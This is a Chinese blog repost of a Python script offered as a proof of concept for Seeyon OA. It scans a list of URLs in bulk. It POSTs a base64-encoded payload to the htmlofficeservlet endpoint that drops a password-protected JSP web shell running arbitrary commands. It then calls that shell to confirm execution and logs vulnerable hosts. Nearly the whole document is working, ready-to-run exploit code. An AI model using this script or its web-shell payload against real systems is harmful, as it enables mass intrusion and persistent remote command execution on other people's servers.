zoukankan      html  css  js  c++  java
  • 致远OA利用POC

    批量检测url

    在脚本同目录下建立url.txt

    放入待检测的URL

    运行脚本

    # Wednesday, 26 June 2019
    # Author:nianhua
    # Blog:https://github.com/nian-hua/
    
    import re
    import requests
    import base64
    from multiprocessing import Pool, Manager
    
    def send_payload(url):
    
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    
        payload = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U="
    
        payload = base64.b64decode(payload)
    
        try:
    
            r = requests.post(url + '/seeyon/htmlofficeservlet', data=payload)
    
            r = requests.get(
                url + '/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+wangming')
    
            if "wangming" in r.text:
    
                return url
    
            else:
    
                return 0
    
        except:
    
            return 0
    
    def remove_control_chars(s):
        control_chars = ''.join(map(unichr, range(0,32) + range(127,160)))
        
        control_char_re = re.compile('[%s]' % re.escape(control_chars))
    
        s = control_char_re.sub('', s)
    
        if 'http' not in s:
    
            s = 'http://' + s
    
        return s
    
    def savePeopleInformation(url, queue):
    
        newurl = send_payload(url)
    
        if newurl != 0:
    
            fw = open('loophole.txt', 'a')
            fw.write(newurl + '
    ')
            fw.close()
    
        queue.put(url)
    
    def main():
    
        pool = Pool(10)
    
        queue = Manager().Queue()
    
        fr = open('url.txt', 'r')
    
        lines = fr.readlines()
    
        for i in lines:
    
            url = remove_control_chars(i)
    
            pool.apply_async(savePeopleInformation, args=(url, queue,))
    
        allnum = len(lines)
    
        num = 0
    
        while True:
    
            print queue.get()
    
            num += 1
    
            if num >= allnum:
    
                fr.close()
    
                break
    
    if "__main__" == __name__:
    
        main()
    
  • 相关阅读:
    19. vue的原理
    18.jwt加密
    17.vue移动端项目二
    16.vue-cli跨域,swiper,移动端项目
    15.vue动画& vuex
    14.vue路由&脚手架
    13.vue组件
    12.vue属性.监听.组件
    11.vue 数据交互
    从尾到头打印链表
  • 原文地址:https://www.cnblogs.com/5haoanqu/p/11099789.html
Copyright © 2011-2022 走看看